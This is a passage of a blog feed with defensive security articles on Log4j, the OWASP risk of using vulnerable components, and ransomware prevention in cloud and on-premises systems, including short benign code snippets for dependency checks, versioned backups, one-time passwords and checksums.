&lt;li&gt;If you have a 3rd party dependency in your codebase, or if you're using 3rd party software, this will happen to you at some point. It doesn't matter whether it's paid or open-source; there will be a vulnerability. Hopefully it won't be as bad as this one, but it will happen.&lt;/li&gt;
&lt;li&gt;When it happens, you need to be ready to update any and all dependencies at a moment's notice. Invest in building out pipelines to make these kinds of changes quick and painless. You don't want to end up in a race with the hackers.&lt;/li&gt;
&lt;li&gt;If you're using a 3rd party library, do your due diligence. Read the code. Have other developers read the code. Treat it like a code review for your own products. If it's not code that you'd accept from your own team, then don't put it in your project.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd like to say this event is over, but it's just getting started. Most of the big players have patched their systems by now, but there will be stragglers, and I'm sure there are some big players that have already been hit. We probably won't see those disclosures for a couple of weeks yet. I think &lt;a href="https://twitter.com/marcwrogers/status/1470504212031279111"&gt;Marc Rogers&lt;/a&gt; sums it up pretty well.&lt;/p&gt;


&lt;blockquote class="ltag__twitter-tweet"&gt;

  &lt;div class="ltag__twitter-tweet__main"&gt;
    &lt;div class="ltag__twitter-tweet__header"&gt;
      &lt;img class="ltag__twitter-tweet__profile-image" src="https://res.cloudinary.com/practicaldev/image/fetch/s--zh-gx2J0--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://pbs.twimg.com/profile_images/1418139016420118529/7jDfhDau_normal.jpg" alt="Marc Rogers profile image"&gt;
      &lt;div class="ltag__twitter-tweet__full-name"&gt;
        Marc Rogers
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__username"&gt;
        @marcwrogers
      &lt;/div&gt;
      &lt;div class="ltag__twitter-tweet__twitter-logo"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ir1kO05j--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-f95605061196010f91e64806688390eb1a4dbc9e913682e043eb8b1e06ca484f.svg" alt="twitter logo"&gt;
      &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__body"&gt;
      In short, log4j is probably one of the worst vulns I have seen in decades, I expect it to have a really long tail. Boxes will be popped long after it is front page news. Cleanup in internet aisle 10 :(
    &lt;/div&gt;
    &lt;div class="ltag__twitter-tweet__date"&gt;
21:21 - 13 Dec 2021
    &lt;/div&gt;


    &lt;div class="ltag__twitter-tweet__actions"&gt;
      &lt;a href="https://twitter.com/intent/tweet?in_reply_to=1470504212031279111" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--fFnoeFxk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-reply-action-238fe0a37991706a6880ed13941c3efd6b371e4aefe288fe8e0db85250708bc4.svg" alt="Twitter reply action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/retweet?tweet_id=1470504212031279111" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--k6dcrOn8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-retweet-action-632c83532a4e7de573c5c08dbb090ee18b348b13e2793175fea914827bc42046.svg" alt="Twitter retweet action"&gt;
      &lt;/a&gt;
      &lt;a href="https://twitter.com/intent/like?tweet_id=1470504212031279111" class="ltag__twitter-tweet__actions__button"&gt;
        &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SRQc9lOp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev.to/assets/twitter-like-action-1ea89f4b87c7d37465b0eb78d51fcb7fe6c03a089805d7ea014ba71365be5171.svg" alt="Twitter like action"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/blockquote&gt;


&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image" width="800" height="280"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>java</category>
    </item>
    <item>
      <title>OWASP Top 10 for Developers: Using Components with Known Vulnerabilities</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Sep 2021 05:40:31 +0000</pubDate>
      <link>https://forem.com/leading-edje/owasp-top-10-for-developers-using-components-with-known-vulnerabilities-13j1</link>
      <guid>https://forem.com/leading-edje/owasp-top-10-for-developers-using-components-with-known-vulnerabilities-13j1</guid>
      <description>&lt;p&gt;The OWASP Top 10 is an open-source project that lists the ten most critical security risks to web applications. By addressing these issues, an organization can greatly improve the security of their software applications. Unfortunately, many developers aren't familiar with the list, or don't have a thorough understanding of the vulnerabilities and how to prevent them. In this series, I'm going to break down each of the vulnerabilities on the list, explain what each one is, how to identify it in your projects, and how to prevent it.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a href="https://owasp.org/www-project-top-ten/2017/A9_2017-Using_Components_with_Known_Vulnerabilities" rel="noopener noreferrer"&gt;Using Components with Known Vulnerabilities&lt;/a&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;This is one of the most prevalent issues among the OWASP Top 10. The growing reliance on third-party components creates a risk if dependencies aren't kept up to date. There are numerous tools available to attackers, such as the &lt;a href="https://www.metasploit.com/" rel="noopener noreferrer"&gt;Metasploit Framework&lt;/a&gt;, that allow them to easily identify and exploit known vulnerabilities in applications and operating systems. In many cases, a patch has been released for these vulnerable applications, but the victim organization has been slow to update its dependencies. Additionally, developers may not thoroughly understand the nested dependencies of all of the libraries being used in an application.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you identify it?
&lt;/h3&gt;

&lt;p&gt;Identifying this type of vulnerability requires a thorough review of all frameworks and dependencies used in an application to check for known vulnerabilities listed in the &lt;a href="https://cve.mitre.org/" rel="noopener noreferrer"&gt;CVE database&lt;/a&gt;. Additionally, applications need to be continuously monitored for newly reported vulnerabilities. This can be an extremely time-consuming process, so it's safe to assume that if your organization doesn't have a defined process for regularly updating your dependencies, you probably have at least some vulnerabilities in your application.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you prevent it?
&lt;/h3&gt;

&lt;p&gt;In order to prevent this issue, your organization needs to implement regular checks of your dependencies against the CVE database for known vulnerabilities, as well as establish a process for keeping all dependencies up to date. Fortunately, much of this can be automated using vulnerability scanning tools, such as the &lt;a href="https://owasp.org/www-project-dependency-check/" rel="noopener noreferrer"&gt;OWASP Dependency Check&lt;/a&gt;, &lt;a href="https://retirejs.github.io/retire.js/" rel="noopener noreferrer"&gt;RetireJS&lt;/a&gt;, or &lt;a href="https://brakemanscanner.org/" rel="noopener noreferrer"&gt;Brakeman&lt;/a&gt;. Additional tools, such as &lt;a href="https://www.whitesourcesoftware.com/free-developer-tools/renovate/" rel="noopener noreferrer"&gt;WhiteSource's Renovate&lt;/a&gt;, provide a complete dependency management solution by automatically updating vulnerable dependencies. In addition to keeping dependencies updated, it's important to remove any dependencies that are no longer being used.&lt;/p&gt;
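At their core, the scanners above all do the same thing: take an inventory of what's installed and look each package/version pair up in advisory data. Here's a minimal sketch of that check in Python; the `KNOWN_VULNERABLE` table and the `example-lib` package are hypothetical placeholders, where a real scanner would pull advisory data from the CVE/NVD or OSV databases.

```python
from importlib import metadata

# Hypothetical advisory data: package -> exact versions known to be vulnerable.
# Real tools fetch this from CVE/NVD or OSV feeds and match version ranges.
KNOWN_VULNERABLE = {
    "example-lib": {"1.0.0", "1.0.1"},
}

def find_vulnerable(installed: dict) -> list:
    """Return 'name==version' strings for any installed package whose
    exact version appears in the advisory data."""
    return [
        f"{name}=={version}"
        for name, version in installed.items()
        if version in KNOWN_VULNERABLE.get(name, set())
    ]

# Inventory the current Python environment, then check it.
installed = {d.metadata["Name"]: d.version for d in metadata.distributions()}
print(find_vulnerable(installed))
```

The dedicated tools add the parts this sketch glosses over: authoritative advisory feeds, version-range matching, and resolution of nested (transitive) dependencies.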

&lt;h3&gt;
  
  
  References
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://owasp.org/www-project-top-ten/2017/A9_2017-Using_Components_with_Known_Vulnerabilities" rel="noopener noreferrer"&gt;OWASP Top 10 Project: 9. Using Components with Known Vulnerabilities&lt;/a&gt;&lt;br&gt;
&lt;a href="https://owasp.org/www-project-dependency-check/" rel="noopener noreferrer"&gt;OWASP Dependency Check Project&lt;/a&gt;&lt;br&gt;
&lt;a href="https://retirejs.github.io/retire.js/" rel="noopener noreferrer"&gt;RetireJS&lt;/a&gt;&lt;br&gt;
&lt;a href="https://brakemanscanner.org/" rel="noopener noreferrer"&gt;Brakeman&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.whitesourcesoftware.com/free-developer-tools/renovate/" rel="noopener noreferrer"&gt;WhiteSource Renovate&lt;/a&gt;&lt;br&gt;
&lt;a href="https://cve.mitre.org/" rel="noopener noreferrer"&gt;CVE Database&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>Ransomware in the Cloud: What are the risks and how do you avoid them?</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 15 Sep 2021 04:30:27 +0000</pubDate>
      <link>https://forem.com/leading-edje/ransomware-in-the-cloud-what-are-the-risks-and-how-do-you-avoid-them-4jn8</link>
      <guid>https://forem.com/leading-edje/ransomware-in-the-cloud-what-are-the-risks-and-how-do-you-avoid-them-4jn8</guid>
      <description>&lt;p&gt;Ransomware is the number one cybersecurity threat facing organizations today. According to the annual &lt;a href="https://www.sophos.com/en-us/press-office/press-releases/2021/04/ransomware-recovery-cost-reaches-nearly-dollar-2-million-more-than-doubling-in-a-year.aspx"&gt;Sophos "State of Ransomeware" report&lt;/a&gt; the average total cost of recovery from a ransomware attack more than doubled in 2021 to $1.85 million, up from $761,106 in 2020. I covered some of the &lt;a href="https://dev.to/leading-edje/ransomware-what-is-it-and-how-do-you-avoid-becoming-a-victim-5glc"&gt;basics of ransomware&lt;/a&gt; in a previous article, but what if your organization has moved, fully or partially, to the cloud? Are you safe from ransomware?&lt;/p&gt;

&lt;p&gt;The short answer is no. Just because you've transitioned to the cloud, doesn't mean you can relax on your cybersecurity efforts. All of the major cloud service providers operate on a "shared responsibility" security model. This means that they will handle the security of the infrastructure they provide, but you are responsible for ensuring the security of your apps and data.&lt;/p&gt;

&lt;p&gt;That said, there are plenty of benefits to hosting your data and apps in the cloud. As mentioned, your cloud provider takes on the responsibility for securing the infrastructure that hosts your apps and data. No matter what level of security your organization requires, you have the comfort of knowing that the infrastructure you're using is architected to the specifications of the cloud provider's most security-sensitive clients. In addition, cloud providers generally offer a number of tools and services that can make security easier from your side. Services like identity and access management, monitoring, logging, auditing, data encryption, and key management can be easily integrated into your solutions. While these tools can greatly simplify your cybersecurity initiatives, ensuring that they're used and configured properly is up to you.&lt;/p&gt;

&lt;h2&gt;
  
  
  Ransomware Threats in the Cloud
&lt;/h2&gt;

&lt;p&gt;Servers hosted in the cloud are not inherently any safer from ransomware than they would be if they were running on premises. And the same precautions should be taken for either. However, there are some specific threats to your cloud services that you should be aware of.&lt;/p&gt;

&lt;h3&gt;
  
  
  Document Storage
&lt;/h3&gt;

&lt;p&gt;Many organizations treat cloud document storage services as a form of data backup. This kind of makes sense, right? If you upload a document from your computer to the cloud, then if anything happens to the local version, you can just download the cloud version and you're back up and running. Many of these services include syncing your documents as a feature. Any time you make a change locally, it's automatically uploaded to the cloud, and you don't need to worry about keeping it up to date. The problem is, if your local machine becomes infected with ransomware, when those synced files are encrypted, the encrypted versions will be automatically synced to the cloud. Now your backups are corrupted as well. No matter which document storage solution you use (Dropbox, OneDrive, Google Drive, etc.), if your files are automatically synced, you're vulnerable to this type of attack. Additionally, if the user whose machine is compromised has access to other shared documents in the cloud, those files could also be encrypted by the attacker.&lt;/p&gt;

&lt;p&gt;Using versioning is one way to help prevent data loss from this type of attack, and most storage providers have some form of versioning available. The number of previous versions and how long they are maintained will vary from one vendor to another, and you may need to configure this option in your settings. While versioning can help, it's also best to make regular backups of your cloud files and store them in a separate location, such as an AWS S3 bucket. This way, if your files do become encrypted, you still have a way to restore them.&lt;/p&gt;
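The key property of a separate backup location is that each backup is a new, independent copy rather than an overwrite, so a sync of encrypted files can't clobber older versions. A minimal sketch of that idea in Python (the timestamped-naming and retention scheme here is illustrative, not any particular vendor's approach):

```python
import shutil
import time
from pathlib import Path

def backup_with_versions(src: Path, backup_dir: Path, keep: int = 5) -> Path:
    """Copy `src` into `backup_dir` under a timestamped name, then prune
    the oldest copies so at most `keep` versions remain. Because each
    backup is a new object rather than an overwrite, a later (possibly
    ransomware-encrypted) copy can never replace an earlier good one."""
    backup_dir.mkdir(parents=True, exist_ok=True)
    stamp = time.strftime("%Y%m%d-%H%M%S")
    dest = backup_dir / f"{src.name}.{stamp}.{time.time_ns()}"
    shutil.copy2(src, dest)
    # Timestamped names sort chronologically; drop everything but the newest.
    versions = sorted(backup_dir.glob(f"{src.name}.*"))
    for old in versions[:-keep]:
        old.unlink()
    return dest
```

In a real deployment, `backup_dir` would live somewhere the synced workstation can't write directly, such as an S3 bucket with object versioning and restricted credentials.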

&lt;h3&gt;
  
  
  RansomCloud
&lt;/h3&gt;

&lt;p&gt;RansomCloud is a new strain of ransomware that targets cloud email services. The attacker tricks a user into clicking on a link in an email and allowing access to their cloud account. Once the user accepts, the attacker has full access to their account. To see a RansomCloud attack in real-time, check out this &lt;a href="https://www.datto.com/resources/ransomcloud-demo"&gt;demonstration by Kevin Mitnick&lt;/a&gt;, where he shows just how easy it is to fall victim to this type of attack.&lt;/p&gt;

&lt;p&gt;In order to mitigate the risk of a RansomCloud attack, organizations should regularly back up all cloud email data to a secure location, allowing for speedy recovery. Additionally, advanced antimalware and spam detection should be used to scan for and filter out potentially dangerous emails. Finally, ensure that all employees are trained on the dangers of ransomware, and how to spot and report phishing emails.&lt;/p&gt;

&lt;h3&gt;
  
  
  Malicious Apps and Extensions
&lt;/h3&gt;

&lt;p&gt;With the rapid shift to remote work fueled by the COVID-19 pandemic, IT departments have been forced to find solutions to keep their workers connected and productive. This has caused organizations to drastically increase their reliance on third-party apps and services. While most apps don't cause any security concerns, there are a growing number of malicious apps and browser extensions being spread through the app stores. During installation, these apps will often ask the user to grant permissions to manage data or to access a user's account. Once granted, the attacker has the access they need to begin encrypting files.&lt;/p&gt;

&lt;p&gt;Limiting which apps can be installed on organization hardware via admin controls helps reduce exposure to malicious apps. But the rise of cloud services that can be accessed from multiple devices dramatically increases the risk of account takeover when users install malicious apps from the Android or iOS app stores. This is why it's essential that organizations educate employees about the dangers of malicious software and how to avoid these types of attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Protecting Your Cloud Environments
&lt;/h2&gt;

&lt;p&gt;These are just a few of the attack vectors currently targeting cloud services, and new ones are discovered all the time. So, how do you protect your organization's cloud environment?&lt;/p&gt;

&lt;p&gt;All of the major cloud providers (&lt;a href="https://aws.amazon.com/it/blogs/security/ransomware-mitigation-top-5-protections-and-recovery-preparation-actions/"&gt;AWS&lt;/a&gt;, &lt;a href="https://cloud.google.com/blog/products/identity-security/5-pillars-of-protection-to-prevent-ransomware-attacks"&gt;Google Cloud&lt;/a&gt;, and &lt;a href="https://docs.microsoft.com/en-us/security/compass/protect-against-ransomware"&gt;Azure&lt;/a&gt;), have recently released guidance to help organizations follow best practices in securing their cloud environments. Some of the key takeaways from these documents are:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Identify your sensitive data and evaluate the primary cybersecurity risks your organization faces.&lt;/li&gt;
&lt;li&gt;Implement a robust disaster recovery plan, utilizing your provider's backup and recovery solutions.&lt;/li&gt;
&lt;li&gt;Encrypt all sensitive data, both in transit and at rest.&lt;/li&gt;
&lt;li&gt;Limit attacker access by implementing strict user access policies.&lt;/li&gt;
&lt;li&gt;Keep all applications and operating systems up-to-date, and employ automated tools to regularly apply patches and keep dependencies updated.&lt;/li&gt;
&lt;li&gt;Follow a defined security standard, either a regulatory or compliance standard, such as PCI DSS, or a standard provided by your cloud provider, such as the AWS Well-Architected Framework.&lt;/li&gt;
&lt;li&gt;Make use of monitoring and automated alerting tools.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;While ransomware attacks will continue to evolve, implementing cybersecurity best practices in your cloud environment will go a long way in protecting your organization from becoming a victim of ransomware. For additional information on how to protect your organization see the recent &lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.1800-25.pdf"&gt;NIST special publication&lt;/a&gt; focused on protecting against ransomware attacks. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Ransomware: What is it and how do you avoid becoming a victim?</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Fri, 11 Jun 2021 21:48:41 +0000</pubDate>
      <link>https://forem.com/leading-edje/ransomware-what-is-it-and-how-do-you-avoid-becoming-a-victim-5glc</link>
      <guid>https://forem.com/leading-edje/ransomware-what-is-it-and-how-do-you-avoid-becoming-a-victim-5glc</guid>
      <description>&lt;p&gt;The landscape of malware has shifted dramatically in the past decade or so. Computer viruses that were developed to wreak havoc on companies and individuals by self-replicating, and slowing down or wiping out systems have evolved into big business. Not to diminish the severity of these types of malware, some of them caused billions of dollars in damage. However, the cost of these early viruses usually came in the form of lost revenue due to downtime while the systems were repaired, along with the hit to a company's reputation and customer confidence. Many also resulted in stolen data, leading to compromised credentials and identity theft. But more and more, attackers are shifting to a different type of malware for their attacks. Ransomware isn't a new type of virus. The first known variant was released in 1989. But it's quickly becoming the tool of choice for criminal organizations. The days of hackers being satisfied with simply &lt;b&gt;costing&lt;/b&gt; a company large amounts of money are gone. The hackers' focus has shifted to &lt;b&gt;making&lt;/b&gt; money from their attacks.&lt;/p&gt;

&lt;p&gt;During the Nashville Cyber Security Summit in May, the morning keynote was a briefing from the FBI on the current landscape of cyber threats. It was no surprise to learn that ransomware is one of the most imminent threats they're tracking right now. In the past decade ransomware attacks have increased dramatically, and have become a serious threat to businesses, healthcare, and even to national security. The most notable recent attack, on the Colonial Pipeline, for example, caused a major bottleneck in the gasoline supply chain that resulted in higher gas prices and fuel shortages all along the east coast. While this most recent attack was widely publicized by the media, it's far from an isolated incident. According to the &lt;a href="https://blog.emsisoft.com/en/37314/the-state-of-ransomware-in-the-us-report-and-statistics-2020/"&gt;Emsisoft State of Ransomware Report&lt;/a&gt;, at least 2,354 government, healthcare and educational institutions were hit with ransomware attacks in 2020. The report goes on to state,&lt;/p&gt;

&lt;p&gt;&lt;em&gt;"The attacks caused significant, and sometimes life-threatening, disruption: ambulances carrying emergency patients had to be redirected, cancer treatments were delayed, lab test results were inaccessible, hospital employees were furloughed and 911 services were interrupted."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;And it's no wonder that we're seeing these attacks increase in frequency. It's an extremely lucrative business model for criminal organizations. A &lt;a href="https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force-Report.pdf"&gt;report released by the IST's Ransomware Task Force&lt;/a&gt; estimates that ransomware victims paid a combined $350 million to hackers in 2020, with an average payment of over $312,000.&lt;/p&gt;

&lt;p&gt;But the fallout from ransomware attacks goes beyond the disruptions to public services and healthcare, and the serious threats posed to critical infrastructure. The proceeds paid to these criminal organizations are often used to fund other criminal activities like drug smuggling, human trafficking and terrorism. While law enforcement agencies are stepping up their efforts to combat ransomware, it's important that businesses do everything they can to harden their systems and prevent their organization from becoming a victim.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is ransomware?
&lt;/h2&gt;

&lt;p&gt;At its most basic level, ransomware is a type of computer virus that uses encryption to lock the files on a computer system. The user is then instructed, usually through a file placed on the system by the virus, to pay a specified amount of money to the attacker in order to have their files decrypted. The most common form of payment requested is Bitcoin, due to the anonymity it provides. (Although a &lt;a href="https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside"&gt;recent operation by the FBI&lt;/a&gt; may give the criminals second thoughts about how secure cryptocurrency really is.) Payment is made based on the promise that the hacker will unlock the encrypted files once the funds have been received.&lt;/p&gt;

&lt;p&gt;The earliest known ransomware, the &lt;a href="https://en.wikipedia.org/wiki/Ransomware#Encrypting_ransomware"&gt;"AIDS Trojan"&lt;/a&gt; used a fairly simple encryption algorithm, and it wasn't long before a tool was developed that could decrypt infected systems. Modern ransomware variants have evolved a lot since the first generation. Using the latest encryption algorithms makes it nearly impossible for a victim to unlock the files themselves, without the private key. Additionally, current ransomware variants can do much more than simply encrypt the files on a system. These new variants can open backdoors to the attackers, who can perform reconnaissance activities to determine which files are most valuable to an organization. They may also steal any credentials found on the system and exfiltrate data to the attackers. Some variants will lay dormant for a significant period of time, ensuring that any backups that the organization may use to restore their system are also infected.&lt;/p&gt;

&lt;p&gt;Just as the viruses have evolved, so have the tactics used by the attackers. Early mass attacks on individual users through SPAM phishing campaigns have given way to more targeted attacks on large organizations. The theory being that these types of targets have the ability to pay higher ransoms than individuals for the same level of effort on the attackers' part, and they're more likely to pay the ransom due to the nature of the data on their systems. There's also been a large increase in the use of extortion, with groups threatening to release a company's sensitive data if payment isn't made.&lt;/p&gt;

&lt;h2&gt;
  
  
  Should victims pay the ransom?
&lt;/h2&gt;

&lt;p&gt;This is an extremely difficult question to answer. The &lt;a href="https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force-Report.pdf"&gt;Ransomware Task Force report&lt;/a&gt; dedicates an entire section to the topic, and whether or not the government should ban organizations from paying ransom. On one hand, this could potentially decrease the profitability of ransomware attacks, as well as keeping money that could be used for other criminal activity out of the attackers' bank accounts. On the other hand, this approach could lead attackers to target more critical systems, and would almost certainly result in the sale or public release of an organization's data. In the end, the Ransomware Task Force was not able to reach a consensus on whether payments should be prohibited or not, but they did state that they should be discouraged as much as possible.&lt;/p&gt;

&lt;p&gt;Whether a victim should pay the ransom or not has to be considered on a case-by-case basis. Organizations that don't have a good backup and recovery program may have no choice but to pay the attackers, or lose all of their data permanently. Another consideration is the type of data that is stored on the system, and what effect the public release of that data would have on the organization and its customers. Unfortunately, paying the ransom doesn't necessarily guarantee that your data will be unlocked. According to the &lt;a href="https://news.sophos.com/en-us/2021/04/27/the-state-of-ransomware-2021/"&gt;Sophos State of Ransomware 2021 report&lt;/a&gt;, only 8% of victims who paid a ransom actually got all of their files back, with an average of about 65% of files being recovered for most victims. In addition, even if your files are recovered, there's no guarantee that the virus was completely removed from your system, or that the attackers won't sell your data on the dark web anyway. You are dealing with criminals, after all. What's more, paying a ransom may label your organization as a "soft target," which will encourage future attacks, either by the same group or by others. When it comes to ransomware, prevention is the best cure.&lt;/p&gt;

&lt;h2&gt;
  
  
  How do you avoid becoming a victim of ransomware?
&lt;/h2&gt;

&lt;p&gt;In order to avoid becoming a victim of ransomware, organizations need to focus on two primary areas: hardening their systems and recovery planning. Hardening your systems against ransomware is no different than protecting them from other types of malware and intrusions. By following industry best practices, you can greatly reduce your risk of becoming a victim. Recovery planning requires having a plan in place that can get your organization back up and running quickly in the event of a successful attack. With those things in mind, here are a few suggestions to help keep your organization safe:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Educate your users
&lt;/h3&gt;

&lt;p&gt;One of the most important steps in securing your system is making sure that every user in your organization understands how seriously you take security, and that it is part of their job responsibilities to understand common risks and how to avoid them. Users should be trained on topics such as how to avoid phishing attempts and how to identify and report suspicious activity, both on their workstations and in their physical environment. Good security education is even more important for your technical staff. Developers, DBAs and System Admins should all receive regular security training. But it's also important to ensure that trainings are tailored for specific user groups. Forcing your developers to complete an online phishing course every year doesn't help anyone. It costs the organization money and time, and your developers will become jaded to security in general. Instead, provide your more technical users with advanced training on topics like database security or secure coding practices. If every user in your organization can tell how seriously upper management takes security, they will take it seriously as well. For additional tips on fostering a culture of security in your organization, &lt;a href="https://dev.to/leading-edje/cultivating-a-security-focused-development-team-4g1g"&gt;see my previous article on the subject&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Require multi-factor authentication
&lt;/h3&gt;

&lt;p&gt;Requiring your users to log in to your systems with multi-factor authentication goes a long way in preventing credential attacks. Even if a user's password has been compromised, requiring the use of an MFA app will prevent access by anyone who doesn't have the device needed to authenticate. Assuming your user didn't have their device stolen by the same person that accessed their credentials (not out of the question, but unlikely), you can be fairly certain that any login came from an authorized user.&lt;/p&gt;
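To see why the physical device matters, it helps to know how the rotating codes in an MFA app are computed. They're typically time-based one-time passwords (RFC 6238): an HMAC of the current 30-second window, keyed by a secret that lives only on the enrolled device and the server. A minimal sketch using only the standard library:

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, at_time: int, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 time-based one-time password (HMAC-SHA1 variant).
    `secret` is the key shared at enrollment; `at_time` is Unix time."""
    counter = at_time // step                       # which 30-second window
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)
```

Because the code is derived from a secret that never leaves the device, a stolen password alone isn't enough; this matches the RFC 6238 test vectors (e.g. secret `12345678901234567890` at time 59 yields `94287082` with 8 digits).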

&lt;h3&gt;
  
  
  3. Enforce strong passwords
&lt;/h3&gt;

&lt;p&gt;Your password policy should ensure that any brute force password attacks on your systems will not be successful. You can reference the &lt;a href="https://pages.nist.gov/800-63-3/sp800-63b.html"&gt;NIST Digital Identity Guidelines&lt;/a&gt; to ensure you're following best practices in defining your password policies. If possible, avoid user-generated passwords altogether by utilizing a password manager, with strong, randomly generated passwords, and a unique password for each application a user will log into.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Implement "Least Privilege" principles across your systems
&lt;/h3&gt;

&lt;p&gt;The principle of least privilege ensures that users only have access to the resources they need to do their job, and nothing more. Cases where a user needs temporary access should require approval, and access should be removed as soon as the task is complete. The same is true for your internal applications. Each application should only be able to communicate with the systems it requires. All other traffic should be restricted, and any unnecessary protocols should be disabled.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Keep your software up to date
&lt;/h3&gt;

&lt;p&gt;This is one of the biggest things you can do to prevent attacks, and unfortunately, it's one of the most often neglected. Attacks using a brand new exploit are fairly rare. The vast majority exploit known vulnerabilities in software packages or operating systems. In many successful attacks, a patch had already been released, but the victim hadn't updated their system yet. Ensure that all of your users' workstations receive automatic updates, and implement a process for updating any other machines regularly. Make certain that you are keeping up with the latest additions to the &lt;a href="https://nvd.nist.gov/"&gt;NIST National Vulnerability Database&lt;/a&gt; and applying patches to any vulnerable software immediately. If your organization develops software, make sure all third-party dependencies are kept up to date. I've seen too many organizations push off CVE warnings from their static scanners because a fix conflicts with another dependency and would require significant refactoring. These organizations are willingly opening themselves up to become ransomware victims, and the fact that they haven't yet is pure luck. In my opinion, keeping your dependencies up-to-date should take precedence over all new feature work.&lt;/p&gt;
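The check behind "a patch had already been released, but the victim hadn't updated" is simple to automate: compare each installed version against the first release containing the fix. A toy sketch in Python; the `PATCHED_IN` table is illustrative advisory data, and real tools use full semver/PEP 440 parsing rather than this simple dotted-integer comparison:

```python
def parse_version(v: str) -> tuple:
    """Parse a simple dotted version ('2.14.1') into comparable integers.
    Illustrative only; real tools handle pre-releases, epochs, etc."""
    return tuple(int(part) for part in v.split("."))

# Illustrative advisory table: package -> first version containing the fix.
PATCHED_IN = {
    "log4j-core": "2.17.1",
}

def needs_update(name: str, installed: str) -> bool:
    """True if the installed version predates the first patched release."""
    fixed = PATCHED_IN.get(name)
    return fixed is not None and parse_version(installed) < parse_version(fixed)
```

Run against a dependency manifest in CI, a check like this turns "we'll get to it" into a failing build, which is exactly the pressure those pushed-off CVE warnings need.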

&lt;h3&gt;
  
  
  6. Have a good backup process in place
&lt;/h3&gt;

&lt;p&gt;Make sure that you're regularly backing up all of your data, and that it's stored in a safe location that isn't connected to your network. Your backups should be tested regularly to ensure that they haven't been corrupted, and you should practice restoring from your backups on a regular basis.&lt;/p&gt;
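
&lt;p&gt;One small piece of that regular testing can be automated: verifying that backup files still match the checksums recorded when they were taken. A minimal sketch in Python (the idea of a checksum manifest is an illustrative choice, not a prescribed format):&lt;/p&gt;

```python
import hashlib
from pathlib import Path

def checksum(path: Path) -> str:
    """SHA-256 digest of a file, streamed in chunks to handle large backups."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

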